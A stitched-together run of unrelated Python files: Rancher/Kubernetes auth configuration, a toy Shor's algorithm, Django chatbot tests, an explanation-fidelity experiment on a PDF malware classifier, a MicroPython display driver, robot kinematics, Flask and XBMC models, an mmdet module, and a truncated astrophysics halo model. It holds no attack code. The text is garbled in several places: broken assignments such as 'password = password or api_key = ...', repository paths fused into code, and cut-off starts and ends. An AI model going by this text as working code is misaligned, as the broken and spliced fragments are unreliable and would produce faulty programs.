else default headers """ _headers = DefaultHeaders username = username or cls.username password = password or api_key = api_key or cls.api_key api_token = api_token or cls.api_token auth_prefix = auth_prefix or cls.auth_prefix api_key_prefix = api_key_prefix or cls.api_key_prefix if username and password: _headers[auth_prefix] = f'Basic {Base.b64_encode(username + ":" + password)}' elif api_token: _headers[auth_prefix] = f'Bearer {api_token}' elif api_key: _headers[auth_prefix] = f'{api_key_prefix}{api_key}' return _headers @classmethod @timed_cache(60) def get_config(cls, host: str = None, username: str = None, password: str = None, api_key: str = None, api_token: str = None, auth_prefix: str = None, api_key_prefix: str = None): """ Native Kubernetes Python Configuration Because of how oddly the configuration is needed to be set, this is a helper method to make sure its properly set up. """ host = host or cls.host username = username or cls.username password = password or api_key = api_key or cls.api_key api_token = api_token or cls.api_token auth_prefix = auth_prefix or cls.auth_prefix api_key_prefix = api_key_prefix or cls.api_key_prefix cfg = Configuration(host=host) if username and password: cfg.api_key_prefix[auth_prefix] = 'basic' cfg.api_key[auth_prefix] = Base.b64_encode(username + ":" + password) elif cls.api_token: cfg.api_key_prefix[auth_prefix] = 'bearer' cfg.api_key[auth_prefix] = api_token elif cls.api_key: cfg.api_key_prefix[auth_prefix] = api_key_prefix cfg.api_key[auth_prefix] = api_key return cfg @classproperty def headers(cls): return cls.get_headers() @classproperty def config(cls): return cls.get_config() class RancherCtx(BaseModel): host: str cluster_name: str cluster_id: str registration_token: str @property def cluster_url(self): # https://localhost/k8s/clusters/c-m-xxxx if self.cluster_name == 'local': return self.host return f'{self.host}/k8s/clusters/{self.cluster_id}' class KctlContextCfg: def __init__(self, host: str = KctlCfg.host, api_version: str = 'v1', api_token: str = KctlCfg.api_token, ssl_verify: bool = True, strict: bool = False, cache_time: int = 86400, cache_dir: Union[Path, str] = DefaultCacheDir, rancher_default_cluster: str = None, rancher_fleet_name: str = 'fleet-default', clusters_enabled: List[str] = [], clusters_disabled: List[str] = [] ): self.host = host or KctlCfg.host self.token = api_token or KctlCfg.api_token self.api_version = envToStr('KCTL_API_VERSION', api_version or 'v1') self.ssl_verify = envToBool('KCTL_SSL_VERIFY', str(ssl_verify)) self.strict = envToBool('KCTL_STRICT', str(strict)) self.cache_time = envToInt('KCTL_CACHE_TIME', cache_time) self.cache_dir = to_path(envToStr('KCTL_CACHE_DIR', None) or cache_dir) self.cache_dir.mkdir(parents = True, exist_ok = True) self.rancher_default_cluster = envToStr('KCTL_RANCHER_DEFAULT_CLUSTER', rancher_default_cluster) self.rancher_fleet_name = envToStr('KCTL_RANCHER_FLEET_NAME', rancher_fleet_name) # If both are empty, then it will assume all clusters are enabled. self.clusters_enabled = envToList('KCTL_CLUSTERS_ENABLED', clusters_enabled) self.clusters_disabled = envToList('KCTL_CLUSTERS_DISABLED', clusters_disabled) self.rancher_ctxs: Dict[str, RancherCtx] = {} def build_rancher_ctx(self, v1_client, v3_client): """After rancher client initialization, will populate the cluster-ids from calling the api""" clusters = v3_client.list_cluster() registration_tokens = v1_client.list_management_cattle_io_clusterregistrationtoken() all_enabled = not self.clusters_disabled and not self.clusters_enabled for cluster in clusters.data: if not all_enabled and (cluster.name in self.clusters_disabled or (self.clusters_enabled and cluster.name not in self.clusters_enabled)): continue if not self.rancher_default_cluster: self.rancher_default_cluster = cluster.name token = [t.status.token for t in registration_tokens.data if cluster.id in t.id] token = token[0] if token else '' self.rancher_ctxs[cluster.name] = RancherCtx( host = self.host, cluster_name = cluster.name, cluster_id = cluster.id, registration_token = token ) def get_kctx(self, cluster_name: str = None, set_default: bool = False): if not cluster_name and not self.rancher_ctxs and not self.rancher_default_cluster: return None if not self.rancher_ctxs.get(cluster_name) and self.rancher_default_cluster: logger.error(f'Cannot retrieve ctx: {cluster_name}. Building Default: {self.rancher_default_cluster}') cluster_name = self.rancher_default_cluster ctx = self.rancher_ctxs.get(cluster_name) if not ctx: logger.error(f'No Context for {ctx} was found.') return None if ctx and set_default: self.rancher_default_cluster = ctx.cluster_name return ctx @timed_cache(60) def get_config(self, cluster_name: str = None): """ Native Kubernetes Python Configuration Because of how oddly the configuration is needed to be set, this is a helper method to make sure its properly set up. """ if not self.rancher_ctxs and not self.rancher_default_cluster: return KctlCfg.config ctx = self.get_kctx(cluster_name) if not ctx: return KctlCfg.get_config(host = self.host, api_token = self.token) return KctlCfg.get_config(host = ctx.cluster_url, api_token = self.token) def get_url(self, cluster_name: str = None, set_default: bool = False): if not self.rancher_ctxs and not self.rancher_default_cluster: url = self.host else: ctx = self.get_kctx(cluster_name, set_default = set_default) url = ctx.cluster_url or self.host if not url.endswith(self.api_version): url += f'/{self.api_version}' return url @property def headers(self): return KctlCfg.get_headers(api_token = self.token) @property def config(self): return self.get_config() @property def url(self): return self.get_url() @property def is_enabled(self): return bool(self.token and self.host) def validate_fleet_url(self, url: str): if 'management.cattle.io.clusterregistrationtokens' in url: return url if self.api_version == 'v1' and self.rancher_fleet_name not in url and 'k8s/cluster' not in url: url += f'/{self.rancher_fleet_name}' return url import sys from math import log, ceil from Quantum import quantum_period """ This code is a simplified implementation of the Shor's Algorithm for N=15 The code is written to run on a 5Qbit IBMQ quantum processor """ def main(): N = 3*5 print ("\n") print ("===========================================") print (" SHOR'S ALGPRITHM") print ("===========================================") print ("\n") #N is the prime factor to be factorized, # (Currently, the IBMQ processor has 5qbits, # So the number to be factorized should be less 2^5 = 32) Check(N) # for large N's randint() should be used to generate guesses instead of range() for a in range(2, N-1): divisor = gcd(a, N) if divisor!=1: #we found a non trivial factor of N print("Factors found without shor: N=", divisor, " * " , N/divisor) break else: p1, p2 = Shor(N, a) if(p1 != 1 and p2 != 1): print("Factors found with shor: N =", int(p1), "*", int(p2)) break # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Procedure def Check(N): # checks if N is even if N % 2 == 0: print("Factors found: N =", N/2, "*", 2) raise ValueError('N is even, 2 is a trivial factor') # checks if N has any integer roots N^(1/k), for 2 < k < log2(N) for k in range(2,int(log(N,2))): root = N**(1/k) if root.is_integer(): raise ValueError('N has a natural nth root. N = {}^{}'.format(int(root), k)) # https://en.wikipedia.org/wiki/Greatest_common_divisor def gcd(a, b): # Compute the GCD with Euclide algorithm while b: a, b = b, a%b return a def Shor(N, a): n_bit = ceil(log(N,2)) # amount of bits necessary for given N print('Using {} qubits'.format(n_bit)) # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Finding_the_period r = quantum_period(a, N, n_bit) # Quantum part of the algorithm # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Obtaining_factors_from_period if r % 2 == 0 : if a**(r/2) % N != -1: p1 = gcd(a**(r/2)-1,N) p2 = gcd(a**(r/2)+1,N) print ("\n Attempt N =", int(p1), "*", int(p2)) if (p1!=1 and p1!=N): return p1, N/p1 if (p2!=1 and p2!=N): return p2, N/p2 return p1, p2 if __name__ == '__main__': main() 1-10 from django.test import TestCase from example_app.views import ChatterBotApiView class MockResponse(object): def __init__(self, pk): self.session = {'conversation_id': pk} class ViewTestCase(TestCase): def setUp(self): super(ViewTestCase, self).setUp() self.view = ChatterBotApiView() def test_get_conversation(self): conversation_id = self.view.chatterbot.storage.create_conversation() mock_response = MockResponse(conversation_id) conversation = self.view.get_conversation(mock_response) self.assertEqual(conversation_id, conversation.id) def test_get_conversation_invalid(self): mock_response = MockResponse(0) session = self.view.get_conversation(mock_response) self.assertNotEqual(session.id, 'test-session-id') def test_get_conversation_nonexistent(self): mock_response = MockResponse(None) mock_response.session = {} session = self.view.get_conversation(mock_response) self.assertNotEqual(session.id, 'test-session-id') 1-10 from totalimpact import fakes import logging, time, random, string, datetime # setup logging class ContextFilter(logging.Filter): def filter(self, record): record.msg = "test '{name}': {msg}".format( name=self.test_name, msg=record.msg ) return True logger = logging.getLogger("ti.testers") class CollectionTester(object): def test(self, method): start = time.time() interaction_name = ''.join(random.choice(string.ascii_lowercase) for x in range(5)) # all log messages will have the name of the test. f = ContextFilter() f.test_name = interaction_name logger.addFilter(f) logger.info(u"{classname}.{action_type}('{interaction_name}') starting now".format( classname=self.__class__.__name__, action_type=method, interaction_name=interaction_name )) try: error_str = None result = getattr(self, method)(interaction_name) except Exception, e: error_str = e.__repr__() logger.exception(u"{classname}.{method}('{interaction_name}') threw an error: '{error_str}'".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, error_str=error_str )) result = None end = time.time() elapsed = end - start logger.info(u"{classname}.{method}('{interaction_name}') finished in {elapsed} seconds.".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, elapsed=round(elapsed, 2) )) # this is a dumb way to do the times; should be using time objects, not stamps report = { "start": datetime.datetime.fromtimestamp(start).strftime('%m-%d %H:%M:%S'), "end": datetime.datetime.fromtimestamp(end).strftime('%m-%d %H:%M:%S'), "elapsed": round(elapsed, 2), "action": "collection." + method, "name": interaction_name, "result":result, "error_str": error_str } logger.info(u"{classname}.{method}('{interaction_name}') finished. Here's the report: {report}".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, report=str(report) )) return report def create(self, interaction_name): ''' Imitates a user creating and viewing a collection. Should be run before commits. Is also run regularly on the production server. Would be better to walk through the actual pages with a headless browser, but they are so heavy on js, that seems very hard. Soo we use the fake pages to imitate the AJAX calls the js pages make. ''' logger.debug(u"in the 'create' method now.") ccp = fakes.CreateCollectionPage() sampler = fakes.IdSampler() ccp.enter_aliases_directly([["doi", x] for x in sampler.get_dois(5)]) ccp.get_aliases_with_importers("github", sampler.get_github_username()) # include a paper known to be in the DB: it is in the official sample collection ccp.enter_aliases_directly([["doi", "10.1186/1471-2148-9-37"]]) logger.info(u"all aliases in collection {aliases}".format(aliases=str(ccp.aliases))) ccp.set_collection_name(interaction_name) return ccp.press_go_button() def read(self, interaction_name, collection_name="kn5auf"): '''Imitates a user viewing the sample collection. This method is useful for testing, and should be run before commits. However, in production we use StillAlive to actually load and check the report page using a headless browswer, which is better than this simulation. ''' logger.debug(u"in the 'read' method now.") report_page = fakes.ReportPage(collection_name) result = report_page.poll() return result def update(self, interaction_name, collection_name="kn5auf"): '''Imitates a user updating a collection Not implemented yet because isn't as common or important. ''' pass def delete(self, interaction_name): '''Imitates a user updating a collection Listed for CRUD completeness, but don't think we need this. ''' pass import os os.environ["CUDA_VISIBLE_DEVICES"] = "1" from Pdf_malware.Scripts.LEMNA import xai_rnn from Pdf_malware.Scripts.utils import * import matplotlib.pyplot as plt import innvestigate class FidelityMetric(): def __init__(self, data, model, important, maxselNum, neg_x, step = 1): self.data = data.copy() self.important = important self.maxselNum = maxselNum self.neg_x = neg_x self.step = step self.iter = int(maxselNum / step) self.model = model def AugmentTest(self): AugmentRes = [] for i in range(self.iter): testdata = self.neg_x.copy() xpos = np.arange(0, len(self.data)) for j in range(i * self.step): pos = np.int32(self.important[:, j]) testdata[xpos, pos] = self.data[xpos, pos] AugmentRes.append(np.sum(self.model.predict(testdata) > 0.5) / len(self.data)) return AugmentRes def DeductionTest(self): DeductionRes = [] for i in range(self.iter): testdata = self.data.copy() xpos = np.arange(0, len(self.data)) for j in range(i * self.step): pos = np.int32(self.important[:, j]) testdata[xpos, pos] = 1 - self.data[xpos, pos] DeductionRes.append(np.sum(self.model.predict(testdata) > 0.5)/ len(self.data)) return DeductionRes class FidelityTest(): def __init__(self, model, puppetmodel, x, y, neg_x, testNum = 100, selNum = 10, step = 1): self.model = model self.puppetmodel = puppetmodel self.x = x[0 : testNum] self.y = y[0 : testNum] self.testNum = testNum self.selNum = selNum self.neg_x = neg_x[0 : testNum] self.step = step self.baseline = [ "gradient", #gradient "integrated_gradients", "deep_taylor", ] def Denasfidelity(self, ): importantInx = [] for i in range(self.testNum): x = self.x[i: i + 1] rule = [] importantpos = [] while len(rule) <= self.selNum: activationState = calAcStateFromRule(rule, self.model) contributionVec = calContributionVec(self.puppetmodel, activationState) for pt in rule: contributionVec[int(pt/2)] = 0 add = 0 while add <= self.step: newpt = np.argmax(np.abs(contributionVec)) if contributionVec[newpt] > 0: newpt = newpt * 2 + 1 else: newpt = newpt * 2 pos = int(newpt / BIT) val = newpt % BIT if x[0, pos] == val: importantpos.append(pos) rule.append(newpt) add += 1 contributionVec[pos] = 0 importantInx.append(np.array(importantpos)) importantInx = np.array(importantInx) print("denas explain finished") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importantInx[i]] RuleSet.append(rule) f = open('../RuleSet/denas.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importantInx, self.selNum, self.neg_x, step = self.step) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def Lemnafidelity(self,): importantInx = np.zeros_like(self.x) for i in range(self.testNum): x_test = self.x[i: (i + 1)] xai_test = xai_rnn(self.model, x_test) importantInx[i] = np.array(xai_test.xai_feature(500)) print("lemna finish extract explanation") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importantInx[i]] RuleSet.append(rule) f = open('../RuleSet/lemna.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importantInx, self.selNum, self.neg_x, step = self.step) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def Baselinefidelity(self, i_num, num = 2): analysis = np.zeros_like(self.x, dtype=np.float32) step = int(self.testNum / num) analyzer= innvestigate.create_analyzer(self.baseline[i_num], self.model) for i in range(num): st = int((i) * step) ed = int((i + 1) * step) analysis[st : ed] = analyzer.analyze(self.x[st : ed]) importIndex = np.argsort(analysis * -1, axis= 1) print(self.baseline[i_num], "finish explanation") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importIndex[i]] RuleSet.append(rule) f = open('../RuleSet/' + self.baseline[i_num] + '.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importIndex, self.selNum, self.neg_x) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def getFidelityRes(fid ): baselineNum = 3 AugplotArr = np.zeros([10, baselineNum + 2]) DecplotArr = np.zeros([10, baselineNum + 2]) x_axis = np.arange(0, 10, 1) for i in range(baselineNum): AugplotArr[:, i], DecplotArr[:, i] = fid.Baselinefidelity(i) AugplotArr[:, baselineNum], DecplotArr[:, baselineNum] = fid.Lemnafidelity() AugplotArr[:, baselineNum + 1], DecplotArr[:, baselineNum + 1] = fid.Denasfidelity() print('AugplotArr') print(AugplotArr) print('DecplotArr') print(DecplotArr) np.savetxt("../Results/AugplotArr.csv", AugplotArr, delimiter=',') np.savetxt("../Results/DecplotArr.csv", DecplotArr, delimiter=',') name = ["gradient", "ig", "deeptaylor", 'lemna', 'denas'] L = [] for i in range(baselineNum + 2): l, = plt.plot(x_axis, AugplotArr[:, i], label=str(i)) L.append(l) plt.legend(handles=L, labels=name) plt.savefig('../Results/AugplotArr.png') plt.cla() #plt.show() name = ["gradient", "ig","deeptaylor", 'lemna', 'denas'] L = [] for i in range(baselineNum + 2): l, = plt.plot(x_axis, DecplotArr[:, i], label=str(i)) L.append(l) plt.legend(handles=L, labels=name) plt.savefig('../Results/DecplotArr.png') #plt.show() def main(): model = load_model("../model/MLP_model.h5") x, y = loaddata("../data/train_model_data.pkl") index = np.random.choice(np.arange(len(x)), 3000) x = x[index] y = y[index] np.save('../Results/x', x) np.save('../Results/y', y) pred_y = model.predict(x, batch_size=5000) > 0.5 pos_x = x[np.where(pred_y > 0)[0]] neg_x = x[np.where(pred_y == 0)[0]] puppetModel = getPuppetModel("../model/MLP_model.h5") fid = FidelityTest(model, puppetModel, pos_x, y, neg_x, testNum= 100, step = 1) getFidelityRes(fid) print("finish accuracy experiment") if __name__ == "__main__": main() from ipmi import ipmitool, IPMIError rgb.py import framebuf import utime import ustruct def color565(r, g, b): return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3 class DummyPin: """A fake gpio pin for when you want to skip pins.""" OUT = 0 IN = 0 PULL_UP = 0 PULL_DOWN = 0 OPEN_DRAIN = 0 ALT = 0 ALT_OPEN_DRAIN = 0 LOW_POWER = 0 MED_POWER = 0 HIGH_PWER = 0 IRQ_FALLING = 0 IRQ_RISING = 0 IRQ_LOW_LEVEL = 0 IRQ_HIGH_LEVEL = 0 def __call__(self, *args, **kwargs): return False init = __call__ value = __call__ out_value = __call__ toggle = __call__ high = __call__ low = __call__ on = __call__ off = __call__ mode = __call__ pull = __call__ drive = __call__ irq = __call__ class Display: _PAGE_SET = None _COLUMN_SET = None _RAM_WRITE = None _RAM_READ = None _INIT = () _ENCODE_PIXEL = ">H" _ENCODE_POS = ">HH" _DECODE_PIXEL = ">BBB" def __init__(self, width, height): self.width = width self.height = height self.x = 0 self.y = 0 self._fg = 0xFFFF self._bg = 0x0000 self.init() def init(self): """Run the initialization commands.""" for command, data in self._INIT: self._write(command, data) def _block(self, x0, y0, x1, y1, data=None): """Read or write a block of data.""" self._write(self._COLUMN_SET, self._encode_pos(x0, x1)) self._write(self._PAGE_SET, self._encode_pos(y0, y1)) if data is None: size = ustruct.calcsize(self._DECODE_PIXEL) return self._read(self._RAM_READ, (x1 - x0 + 1) * (y1 - y0 + 1) * size) self._write(self._RAM_WRITE, data) def _encode_pos(self, a, b): """Encode a postion into bytes.""" return ustruct.pack(self._ENCODE_POS, a, b) def _encode_pixel(self, color): """Encode a pixel color into bytes.""" return ustruct.pack(self._ENCODE_PIXEL, color) def _decode_pixel(self, data): """Decode bytes into a pixel color.""" return color565(*ustruct.unpack(self._DECODE_PIXEL, data)) def pixel(self, x, y, color=None): """Read or write a pixel.""" if color is None: return self._decode_pixel(self._block(x, y, x, y)) if not 0 <= x < self.width or not 0 <= y < self.height: return self._block(x, y, x, y, self._encode_pixel(color)) return self def fill_rectangle(self, x, y, width, height, color): """Draw a filled rectangle.""" if color is None: color = self._fg x = min(self.width - 1, max(0, x)) y = min(self.height - 1, max(0, y)) w = min(self.width - x, max(1, width)) h = min(self.height - y, max(1, height)) self._block(x, y, x + w - 1, y + h - 1, b'') chunks, rest = divmod(w * h, 512) pixel = self._encode_pixel(color) if chunks: data = pixel * 512 for count in range(chunks): self._write(None, data) self._write(None, pixel * rest) self.x = x self.y = y return self def fill(self, color=None): """Fill whole screen.""" if color is not None: self._bg = color return self.fill_rectangle(0, 0, self.width, self.height, color) def hline(self, x, y, width, color=None): """Draw a horizontal line.""" return self.rect(x, y, width, 1, color) def vline(self, x, y, height, color=None): """Draw a vertical line.""" return self.rect(x, y, 1, height, color) def move(self, x=None, y=None): if x: self.x = x if y: self.y = y return self def fg(self, color=None): if color: self._fg = color return self else: return self._fg def bg(self, color=None): if color: self._bg = color return self else: return self._bg def text(self, text, x=None, y=None, color=None, background=None): if background is None: background = self._bg if color is None: color = self._fg if x is None: x = self.x if y is None: y = self.y x = min(self.width - 1, max(0, x)) y = min(self.height - 1, max(0, y)) lines = text.splitlines() longest = 0 for line in lines: longest = max(longest, len(line)) h = min(self.height - y, 8) buffer = bytearray(longest * 8 * 8 * 2) fb = framebuf.FrameBuffer(buffer, 8 * longest, 8, framebuf.RGB565) for line in lines: fb.fill(background) fb.text(line, 0, 0, color) self.blit_buffer(buffer, x, y, len(line) * 8, h) y += 8 if y >= self.height: break def blit_buffer(self, buffer, x, y, width, height): """Copy pixels from a buffer.""" if (not 0 <= x < self.width or not 0 <= y < self.height or not 0 < x + width <= self.width or not 0 < y + height <= self.height): raise ValueError("out of bounds") view = memoryview(buffer) onerow = 2 * width for row in range(height): offset = row * onerow self._block(x, y + row, x + width - 1, 1, view[offset:offset + onerow]) class DisplaySPI(Display): def __init__(self, spi, dc, cs=None, rst=None, width=1, height=1): self.spi = spi self.cs = cs self.dc = dc self.rst = rst if self.rst is None: self.rst = DummyPin() if self.cs is None: self.cs = DummyPin() self.cs.init(self.cs.OUT, value=1) self.dc.init(self.dc.OUT, value=0) self.rst.init(self.rst.OUT, value=1) self.reset() super().__init__(width, height) def reset(self): self.rst(0) utime.sleep_ms(50) self.rst(1) utime.sleep_ms(50) def _write(self, command=None, data=None): if command is not None: self.dc(0) self.cs(0) self.spi.write(bytearray([command])) self.cs(1) if data is not None: self.dc(1) self.cs(0) self.spi.write(data) self.cs(1) def _read(self, command=None, count=0): self.dc(0) self.cs(0) if command is not None: self.spi.write(bytearray([command])) if count: data = self.spi.read(count) self.cs(1) return data laboratory/Lab6/robot_kinematics.py1-10 import numpy as np def translate(vector): """ returns an homogenous transform for a 2D translate of vector """ transform = np.eye(4) transform[0:3,3] = vector return transform def vec_to_skew(p): """ transforms a 3D vector into a skew symmetric matrix """ return np.array([[0.,-p[2],p[1]],[p[2],0.,-p[0]],[-p[1],p[0],0]]) def twist_to_skew(twist): """ transforms a twist into its bracket representation """ br = np.zeros([4,4]) br[0:3,0:3] = vec_to_skew(twist[0:3]) br[0:3,3] = twist[3:6] return br def getAdjoint(T): """ returns the adjoint of a homogeneous transform """ ad = np.zeros([6,6]) ad[0:3,0:3] = T[0:3,0:3] ad[3:6,3:6] = T[0:3,0:3] ad[3:6,0:3] = vec_to_skew(T[0:3,3]).dot(T[0:3,0:3]) return ad def getExpPureRotationTwist(twist, theta): """ computes the exponential of a pure rotation unit twist applied for theta seconds we specialize the function to speed up computations for the real robot control loop since we know we won't need the v part, we can ignore this part """ T = np.eye(4) br = vec_to_skew(twist[0:3]) T[0:3,0:3] = np.eye(3) + np.sin(theta) * br + (1-np.cos(theta))*br.dot(br) return T def inverseT(T): """ computes the inverse of a homogeneous transform """ T_inv = np.eye(4) T_inv[0:3,0:3] = T[0:3,0:3].T T_inv[0:3,3] = -T[0:3,0:3].T.dot(T[0:3,3]) return T_inv class robot_kinematics: """ This class contains the necessary variables to compute the kinematics and Jacobians of the robot update_kinematics computes all the necessary quantities and homogeneous transforms and store them in instance variables that can be used afterwards """ def __init__(self): # here we define the variables for the robot lengths self.l0 = 0.3 self.l1 = 0.16 self.l2 = 0.16 self.l3 = 0.014 self.rot_axis1 = np.array([1.,0,0,0,0,0]) self.rot_axis2 = np.array([0.,0,1,0,0,0]) self.rot_axis3 = np.array([0.,0,1,0,0,0]) self.q = np.array([0,0,0]) self.spatialJ = np.zeros([6,3]) self.bodyJ = np.zeros([6,3]) self.orientedJ = np.zeros([6,3]) self.update_kinematics(self.q) def update_kinematics(self, q): """ Receives as input the state of the robot (vector of 3 angles) and computes all the homogeneous transforms and the Jacobians """ # first we compute the homogeneous transforms for the relative frames using theta0 to theta2 self.TS_H1 = translate(np.array([self.l0,0,0])).dot(getExpPureRotationTwist(self.rot_axis1,q[0])) self.TH1_H2 = translate(np.array([0,0,self.l3])).dot(getExpPureRotationTwist(self.rot_axis2,q[1])) self.TH2_K = translate(np.array([0,-self.l1,0])).dot(getExpPureRotationTwist(self.rot_axis3,q[2])) self.TK_F = translate(np.array([0,-self.l2,0])) # now we compute the pose of all the frames with respect to S self.TS_H2 = self.TS_H1.dot(self.TH1_H2) self.TS_K = self.TS_H2.dot(self.TH2_K) self.TS_F = self.TS_K.dot(self.TK_F) # we compute the spatial Jacobian self.spatialJ[:,0] = getAdjoint(self.TS_H1).dot(self.rot_axis1) self.spatialJ[:,1] = getAdjoint(self.TS_H2).dot(self.rot_axis2) self.spatialJ[:,2] = getAdjoint(self.TS_K).dot(self.rot_axis3) # the body Jacobian self.bodyJ = getAdjoint(inverseT(self.TS_F)).dot(self.spatialJ) # and the Jacobian with respect to O (the one we will use) TO_S = np.eye(4) TO_S[0:3,3] = -self.TS_F[0:3,3] self.orientedJ = getAdjoint(TO_S).dot(self.spatialJ) def analytic_inverse_kinematics2D(x,y): """ inverse kinematics function input (x,y) position of the foot output a list of 2D vectors which are possible solutions to the problem (the list is empty if there are no solutions) """ l0 = 0.3 l1 = 0.16 l2 = 0.16 l_des = np.sqrt((x-l0)**2 + y**2) ###First we check that the target is feasible otherwise we return empty if l_des > l1 + l2: # this is impossible, there are no solutions we return an empty list return [] # we compute the two possible solutions for theta2 # note that if l_des == l1 + l2 then theta2_p = theta2_m = 0 # so we will return twice the same solution (not ideal but simpler) theta2_p = np.arccos((l_des**2 - l1**2 - l2**2)/(2*l1*l2)) theta2_m = - theta2_p # we now compute alpha and beta as defined above alpha = np.arccos((-l2**2 + l1**2 + l_des**2)/(2*l1*l_des)) beta = np.arctan2(y,x-l0) # we compute alpha1 (the 2 possibilities) theta1_p = np.pi/2 - alpha + beta theta1_m = (alpha + beta + np.pi/2) # we return a list that contains the 2 solutions return [np.array([theta1_p, theta2_p]), np.array([theta1_m, theta2_m])] def compute_trajectory(th_init, th_goal, movement_duration, t): # first we compute the coefficients (as notes above) a5 = 6/(movement_duration**5) a4 = -15/(movement_duration**4) a3 = 10/(movement_duration**3) # now we compute s and ds/dt s = a3 * t**3 + a4 * t**4 + a5 * t**5 ds = 3 * a3 * t**2 + 4 * a4 * t**3 + 5 * a5 * t**4 #now we compute th and dth/dt (the angle and its velocity) th = th_init + s * (th_goal - th_init) dth = (th_goal - th_init) * ds # we return the answer return th, dthkassisdion/Simple_linux_scriptphonebook_server/server/phonebook_server/models.py from flask_sqlalchemy import SQLAlchemy from phonebook_server import app db = SQLAlchemy(app) class Contact(db.Model): id = db.Column(db.Integer,primary_key=True) firstname = db.Column(db.String) lastname = db.Column(db.String) address = db.Column(db.String) phone_number = db.Column(db.String) def __init__(self, firstname, lastname, address, phone_number): self.firstname = firstname self.lastname = lastname self.address = address self.phone_number = phone_number @property def serialize(self): """Return object data in easily serializeable format""" return { 'id' : self.id, 'firstname' : self.firstname, 'lastname' : self.lastname, 'address' : self.address, 'phone_number' : self.phone_number }# -*- coding: utf-8 -*- """ Set the version information for the package """ __author__ = '' __copyright__ = "Copyright (C) 2021 " VERSION = '1.0.3.1' # -*- coding: utf-8 -*- from ironworks import serverTools def highest_position(model): highest_position = 0 items = model.query.all() for item in items: if item.position > highest_position: highest_position = item.position return highest_position + 1 class XbmcServer(): def __init__(self): """Table for the XBMC server config""" self.configDb = serverTools.getPrefsDb() self.configDb.beginTransaction() self.configDb.checkTable("xbmc_servers", [ {"name": "id", "type": "integer primary key autoincrement"}, {"name": "label", "type": "text"}, {"name": "position", "type": "integer"}, {"name": "hostname", "type": "text"}, {"name": "port", "type": "text"}, {"name": "username", "type": "text"}, {"name": "password", "type": "text"}, {"name": "mac_address", "type": "text"}]) self.configDb.commitTransaction() self.label = None self.position = None self.hostname = None self.port = None self.username = None self.password = self.mac_address = None def __repr__(self): return '' % (self.label) def getNumXbmcServers(self): serverList = self.configDb.select("xbmc_servers") servers = serverList.fetchall() servers = len(servers) return servers def xbmcServer(self, label, position, hostname, port='8080', username=None, password=None, mac_address=None): self.label = label if position is None: self.position = highest_position(Disk) else: self.position = position self.hostname = hostname self.port = port self.username = username self.password = password self.mac_address = mac_address # Copyright (c) OpenMMLab. All rights reserved. import torch.nn.functional as F from mmcv.cnn import ConvModule from mmcv.runner import BaseModule, ModuleList class ConvUpsample(BaseModule): """ConvUpsample performs 2x upsampling after Conv. There are several `ConvModule` layers. In the first few layers, upsampling will be applied after each layer of convolution. The number of upsampling must be no more than the number of ConvModule layers. Args: in_channels (int): Number of channels in the input feature map. inner_channels (int): Number of channels produced by the convolution. num_layers (int): Number of convolution layers. num_upsample (int | optional): Number of upsampling layer. Must be no more than num_layers. Upsampling will be applied after the first ``num_upsample`` layers of convolution. Default: ``num_layers``. conv_cfg (dict): Config dict for convolution layer. Default: None, which means using conv2d. norm_cfg (dict): Config dict for normalization layer. Default: None. init_cfg (dict): Config dict for initialization. Default: None. kwargs (key word augments): Other augments used in ConvModule. """ def __init__(self, in_channels, inner_channels, num_layers=1, num_upsample=None, conv_cfg=None, norm_cfg=None, init_cfg=None, **kwargs): super(ConvUpsample, self).__init__(init_cfg) if num_upsample is None: num_upsample = num_layers assert num_upsample <= num_layers, \ f'num_upsample({num_upsample})must be no more than ' \ f'num_layers({num_layers})' self.num_layers = num_layers self.num_upsample = num_upsample self.conv = ModuleList() for i in range(num_layers): self.conv.append( ConvModule( in_channels, inner_channels, 3, padding=1, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, **kwargs)) in_channels = inner_channels def forward(self, x): num_upsample = self.num_upsample for i in range(self.num_layers): x = self.conv[i](x) if num_upsample > 0: num_upsample -= 1 x = F.interpolate( x, scale_factor=2, mode='bilinear', align_corners=False) return x """ Halo Model - Everything in Physical frame, except for p(k) and xi(R) - pk, k, xi, R all comoving - To-do: write a vectorized Simpson integration routine - at >30 Mpc not accurate """ # TO-DO: # 2-halo term for Sigma # Need to tabulate everything in the end import sys import numpy as np from scipy import fftpack from scipy import integrate from scipy import interpolate from scipy.special import hyp2f1, spence import cosmology as cosmo import powerspectra as ps circular_virial = lambda Mhalo, z, CosPar: np.sqrt(cosmo.GG_MSun*Mhalo/virial_radius(Mhalo, 0.52, CosPar)) delta_sc = lambda z, CosPar: 3./20.*pow(12.*np.pi, 2./3.)*(1.+0.013*np.log10(cosmo.Omega_M_z(z, CosPar))) concentration = lambda Mhalo, z, Mhalo_star: 9./(1.+z)*(Mhalo/Mhalo_star)**(-0.13) # There are other models Hu & Kravtsov sigma_M_sqr = lambda Mhalo, z, CosPar: ps.sigma_R_sqr(pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving radius sigma_j_M_sqr = lambda j, Mhalo, z, CosPar: ps.sigma_j_R_sqr(j, pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving radius sigma_j_r_M1_M2_sqr = lambda j, r, Mhalo1, Mhalo2, z, CosPar: sigma_j_r_R1_R2_sqr(j, r, pow(3.*Mhalo1/4./np.pi/cosmo.rho_critical(z, 